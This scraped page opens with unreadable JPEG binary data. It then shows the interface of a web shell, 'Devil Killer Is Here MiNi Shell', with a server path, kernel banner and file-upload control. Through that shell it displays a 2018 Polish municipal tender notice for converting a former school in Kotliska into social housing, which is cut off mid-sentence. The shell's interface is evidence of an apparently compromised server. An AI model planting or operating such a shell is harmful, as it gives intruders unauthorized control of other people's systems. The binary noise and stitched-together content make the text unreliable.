JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20181203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20181203/655950-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 655950-N-2018 z dnia 2018-12-03 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Lwówek Śląski</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Adaptacja budynku po byłej szkole w Kotliskach na mieszkania socjalne</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Lwówek Śląski</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">53064300000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">al. Wojska Polskiego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu"></span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">59600 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Lwówek Śląski</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">dolnośląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">756 477 888</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">urzad@lwowek.home.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">756 477 889</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://www.bip.lwowekslaski.pl/wiadomosci/6733/lista/zamowienia_publiczne</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://www.bip.lwowekslaski.pl/wiadomosci/6733/lista/zamowienia_publiczne </span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Forma pisemna. Oferty należy składać osobiście lub przesłać na adres Zamawiającego.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Gminy i Miasta Lwówek Ślaski, Aleja Wojska Polskiego 25A, 59-600 Lwówek Śląski</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Adaptacja budynku po byłej szkole w Kotliskach na mieszkania socjalne</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">IN.271.42.2018.BSK</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. OGÓLNA CHARAKTERYSTYKA OBIEKTU I ROBÓT BUDOWLANYCH1.1.	DANE OGÓLNEBUDYNEK ,,A"- powierzchnia zabudowy 294,00 m2- powierzchnia użytkowa 552,27 m2- kubatura 3117,38 m3- wysokość budynku 12,40 mBUDYNEK ,,B"- powierzchnia zabudowy 155,40 m2- powierzchnia użytkowa 207,77 m2- kubatura 1019,71 m3- wysokość budynku 8,73 mWIATA- powierzchnia zabudowy 19,80 m2- powierzchnia użytkowa 18,02 m2- kubatura 54,78 m3- wysokość wiaty 2,97 mBudynek ,,A" i ,,B" zaadaptowano na mieszkania socjalne i komórki lokatorskie. W budynku ,,A" zaprojektowano 13 lokali mieszkalnych w tym 3 dwupokojowe i 10 jednopokojowych. W budynku ,,B" zaprojektowano w parterze 16 komórek lokatorskich, na poddaszu 3 lokale mieszkalne w tym 2 jednopokojowe i 1 jednopokojowe.Zaprojektowany został dojazd i dojścia do budynków, dojście do wiaty śmietnikowej utwardzone z kostki betonowej, miejsca postojowe utwardzone kamieniem, przebudowę przyłącza wody do budynku ,,A", nowe przyłącze do budynku ,,B".Ponadto zaprojektowano biologiczną oczyszczalnię ścieków, instalację kanalizacji deszczowej, wewnętrzną linię zasilającą budynki w energię elektryczną. Istniejące przyłącze energii elektrycznej zostanie zlikwidowane przez Zakład Energetyczny.Odprowadzenie wód opadowych z dachów budynków do studni chłonnej zlokalizowanej na terenie działki nr 276/3, z terenów utwardzonych poprzez nadanie sadków na teren zielony działki nr 276/3.1.2. DANE SZCZEGÓŁOWE BUDYNKÓWPrzewiduje się roboty rozbiórkowe m.in. ścian, stropów, posadzki na gruncie, schodów, pokrycia i konstrukcji dachu, stolarki okiennej i drzwiowej. Skucie tynków zewnętrznych, wewnętrznych, wykucia otworów, zamurowania.1.2.1. FundamentyBudynek ,,A" :- odcinkowe odkopanie budynku, - podbicie kamiennych fundamentów w części starej, - oczyszczenie powierzchni całości ścian fundamentowych, - wykonanie obrzutki wyrównującej,- podbicie części fundamentu.Budynek ,,B" : - odcinkowe odkopanie budynku, - podbicie kamiennych fundamentów, - oczyszczenie powierzchni całości ścian fundamentowych, - wykonanie obrzutki wyrównującej.Pod nowo projektowane w obu budynkach ściany, schody, itp. zaprojektowano ławy żelbetowe wylewane na mokro. Zaprojektowano podbicie fundamentów.1.2.2. Ściany:Budynek ,,A" :- istniejące ściany murowane z piaskowca i cegły,- projektowane ściany nośne, wewnętrzne i zewnętrzne z gazobetonu na zaprawie klejowej, - ściany działowe i oddzielenia między lokalami na stropie - technologia lekkiej GK.Budynek ,,B" :- istniejące ściany murowane z piaskowca,- projektowane ściany nośne, wewnętrzne z bloczków silikatowych i zewnętrzne z gazobetonu na zaprawie klejowej,- ściany działowe i oddzielenia między lokalami na stropie - z gazobetonu wytrzymałości 4MPa na zaprawie klejowej,- ściany działowe w komórkach z bloczków silikatowych na zaprawie klejowej.W obu budynkach zaprojektowano zamurowania istniejących otworów bądź ich części z cegły pełnej na zaprawie cementowo wapiennej.1.2.3.Stropy:Budynek ,,A":- pozostawienie w części starej drewnianych stropów, wymienienie belek uszkodzonych i przegniłych, - usunięcie górnych okładzin podłogowych,- wykonanie nowych okładzin od dołu i od góry, zgodnie z częścią architektury,- pozostanie betonowych stropów w części dobudowanej,- usunięcie górnych okładzin podłogowych i wykonanie nowych okładzin od góry zgodnie z częścią architektury.- wykonanie nowego stropu w miejscu wyburzonej małej klatki schodowej.Budynek ,,B" :- istniejące na części stropy łukowe sklepienia występują na różnych poziomach, stropy te należy rozebrać, - wykonanie nowego stropu nad całością - typu Teriva z wykończeniem.1.2.4. Klatka schodowa:- w budynku ,,A" i ,,B" nowe schody żelbetowe ze spocznikiem.1.2.5. Kominy:- istniejące, oraz nowoprojektowane wentylacyjne i spalinowe systemowe,- przekrój komina spalinowego min. fi 150 (w projekcie założono komin fi 160),- wymagany jest komin spalinowy z zastosowaniem do paliw stałych,- w każdym mieszkaniu na trzonie kominowym należy wykonać nad podłogą wyczystkę z drzwiczkami,- kominy w strefie poddasza nieużytkowego (0,5m) oraz ponad dachem obudować cegłą klinkierową gr. 6cm, - ponad dachem otwory wentylacyjne w kominie zabezpieczyć kratkami wentylacyjnymi,- istniejące kominy w budynku ,,A" rozebrać do posadzki kondygnacji poddasza i wymurować nowe z cegły klinkierowej.1.2.6. Izolacje:Izolacje termiczne:- ściany fundamentowe zewnętrzne istniejące - polistyren ekstrudowany XPS na klej (? = 0,036 W/mK), - na istniejących cokołach po obrębie budynku oraz w gruncie ściany zewnętrzne istniejące i projektowane - styropian EPS 80 (? = 0,036 W/mK),- posadzka na gruncie - styropian twardy EPS 200 (? = 0,038 W/mK),- strop nad parterem - styropian twardy EPS 100 (? = 0,038 W/mK), wełna mineralna na klej (? = 0,040 W/mK),- strop ocieplony - wełna mineralna (? max 0,035 W/mK),- połać dachu - wełna mineralna (? max 0,035 W/mK).Izolacje przeciwwilgociowe:- pionowa ścian fundamentowych projektowanych i istniejących - abizol (do stosowania pod styropian) lub dysperbit (dyspersyjna masaasfaltowo- kauczukowa), - poniżej terenu folia kubełkowa,- pozioma ław fundamentowych - 2 x papa podkładowa na uprzednio zagruntowanej powierzchni- posadzki na gruncie - 2 x folia PCV na zakład.1.2.7. Powłoki zabezpieczające:- elementy drewniane - zabezpieczyć przed agresją biologiczną oraz ze względów przeciwpożarowych do stopnia trudno zapalności,- elementy drewniane zewnętrzne dodatkowo malować dwukrotnie lazurą do drewna. Lazura do drewnao czasie ochrony - 8 lat.1.2.8.Więźba dachowa:Budynek ,,A":- istniejąca więźba dachowa budynku drewniana w stanie średnim, - po ściągnięciu pokrycia i łacenia wykonać należy wzmocnienia oraz wymiany elementów zużytych.Budynek ,,B": - istniejąca więźba dachowa w stanie złym zostanie przeznaczona do rozbiórki,- nowa więźba w układzie płatwiowo - jętkowym z lukarnami.W obu budynkach wszystkie nowe elementy projektuje się z drewna sosnowego kl. C24, w budynku ,,B" płatwie stalowe IPE160.1.2.9. Dach:Pokrycie dachów budynku ,,A" i ,,B": dachówką ceramiczną karpiówką gat. 1, układaną w koronkę. W budynku ,,A" występuje również pokrycie papą.1.2.10. Posadzki:- klatka schodowa, komunikacja - płytki gresowe antypoślizgowe,- w mieszkaniach - w łazienkach, kuchniach, aneksach kuchennych - płytki ceramiczne szkliwione cokolikiemo wysokości 10cm, - w pozostałych pomieszczeniach - wykładzina PCV z cokołem PCV,- w komórkach i pom. technicznym - betonowa szczotkowana.1.2.11. Tynki wewnętrzne:- w mieszkaniach, klatkach schodowych tynk cementowo - wapienny III kat. + gładź cementowo - wapienna,- w komórkach tynk cementowo - wapienny III kat.1.2.12. Tynki i elementy wykończenia elewacji:- cienkowarstwowe silikonowe barwione w masie na siatce,- cokół - tynk cienkowarstwowy żywiczny stosowany na zewnątrz,- fasety elewacyjneDla budynku ,,A" i ,,B" należy wykonać termomodernizację.1.2.13. Stolarka okienna i drzwiowa:- okna PCV w systemie rozwierano - uchylnym z możliwością rozszczelnienia, ze szprosami,- profil okien min. sześciokomorowy gł. min. 80mm wzmacniany profilami stalowymi, dwuszybowe,- okna dachowe drewniane Umax 1,5 W/m2K,- parapety wewnętrzne systemowe kompletne PCV,- drzwi wejściowe do budynku dwuskrzydłowe stalowe profilowe ocieplone Umax 1,7 W/m2K,- drzwi z wiatrołapu do komunikacji dwuskrzydłowe z częściowym przeszkleniem, stalowe profilowe ,,zimne",- drzwi wejściowe do mieszkań zewnętrzne przylgowe stalowe, ocieplone,- drzwi wejściowe do komórek i pomieszczeń technicznych uniwersalne stalowe, ocynkowane malowane proszkowo, ocieplone,- drzwi wewnętrzne w mieszkaniach płycinowe z płytą wiórową otworową i ościeżnicą stalową z laminatem, w łazienkach drzwi z wentylacją w dolnej części skrzydła,1.2.14. Malowanie i powłoki zabezpieczające:- w mieszkaniach - na ścianach i sufitach malowanie 2 x farba emulsyjna,- w kuchniach do 1,5m od poziomu posadzki na całej długości ściany tzw. technologicznej, przy której usytuowany jest zlewozmywak z trzonem kuchennym - emalia akrylowa, powyżej farba emulsyjna,- w łazienkach od poziomu posadzki do 2,0m emalia akrylowa, powyżej farba emulsyjna,- klatka schodowa, komunikacja do 2m - 2 x farba lateksowa, powyżej farba emulsyjna.1.2.15. Instalacje wewnętrzneInstalacja c.o. i c.w.:- demontaż istniejących grzejników,- instalacja c.o. dla każdego mieszkania zasilana będzie kuchnią węglową 10kW z wężownicą,- wykonanie instalacji z rur miedzianych, w wykonaniu do wody, łączonych metodą kielichowania i lutowania kapilarnego z zastosowaniem lutów miękkich.- mocowanie rur za pomocą obejm metalowych z wkładką gumową z rozstawem zgodnym z wytycznymi producenta rur.Elementy grzejne:- grzejniki stalowe płytowe białe typu KV z wbudowanym zaworem termostatycznym z możliwością podłączenia od dołu, podejście od ściany, wyposażone w głowicę termostatyczną dedykowaną do danego modelu grzejnika, podejścia grzejników wykonać poprzez bloki zaworowe, przewidziane do danego modelu grzejnika, umożliwiające odcięcie i demontaż pojedynczego grzejnika,- grzejnik drabinkowy łazienkowy biały, podejście od ściany, grzejnik na zasilaniu wyposażyć zawór termostatyczny z głowicą termostatyczną oraz zawór powrotny,- realizowanie regulacji hydraulicznej instalacji poprzez zawory termostatyczne z nastawą wstępną,- odpowietrzenie projektowanej instalacji poprzez odpowietrzniki ręczne na grzejnikach.- po wykonaniu instalacji poddanie próbie szczelności wodą zimną Źródło ciepła- kuchnia węglowa 10kW z wężownicą, metalowa kuchnia węglowa przystosowana do spalania paliw stałych: węgiel kamienny, węgiel brunatny, drewno, przeznaczone do użytkowania w gospodarstwach domowych; posiadająca: trzyczęściową płytę kuchenną (o pow. min. 0,335 m2) z jednym otworem, piekarnik z drzwiczkami z szybą i termometrem, schowek do przechowywania naczyń, popielnik z regulatorem dopływu powietrza, schowek z szufladą na węgiel, na bocznej ścianie dwie dźwignie przesłon spalin, umożliwiające kierowanie spalin w zależności od wykonywanych czynności na: "gotowanie" lub "pieczenie"; - wszystkie elementy kuchni jak: przód, ściany boczne, piekarnik, drzwiczki popielnika i schowka, wykonane z blachy stalowej emaliowanej, - sprowadzenie odpływu rur przelewowej i sygnalizacyjnej nad zlewozmywak. - wykonanie instalacji w obrębie kuchni (kotłowni) z rur i kształtek miedzianych łączonych z pomocą lutowania miękkiego i zastosowaniem łączników kapilarnych,- uzupełnianie wody, napełnianie instalacji c.o. z wodociągu, poprzez zawór odcinający i antyskażeniowy DN15 typu CA montowany pod zlewozmywakiem lub przy kuchni węglowej - zabrania się stałego wykonania stałego połączania instalacji wodociągowej i c.o. Wentylacja pomieszczenia z kuchnią węglową- nawiew - nawietrzak pod okienny 38x7 cm z ruchomą żaluzją od strony mieszkania i okapnikiem od strony zewnętrznej,- wywiew - kanał wywiewny wyprowadzony ponad dach,- wyposażenie pomieszczeń z kuchnią węglową w czujnik CO połączony z sygnalizatorem dźwiękowym.Instalacja wodna:- zasilanie z wiejskiej sieci wodociągowej projektowanymi przyłączami,- wykonanie rur PEX w zwoju, rury polietylenowe łączyć za pomocą połączeń samozaciskowych przy użyciu kształtek mosiężnych,- wyposażenie w zawory podejściowe do baterii 3/8",- bezpośrednie podłączenie baterii czerpalnych wykonać za pomocą giętkich przewodów w oplocie metalowym, - wykonanie szczelnienia połączeń gwintowanych taśmą teflonową,- wyposażenie instalacji w baterie czerpalne jednouchwytowe z perlatorem i ogranicznikiem wypływu wody, wyposażone w głowice ceramiczne, z jednej linii wzorniczej, przy umywalce stojące,- dla każdego mieszkania przewidziano pomiar zużycia wody zimnej realizowany z pomocą wodomierza DN15 qn=1,5 m3/h zabudowanego na wejściu wody do mieszkania,- wodomierze 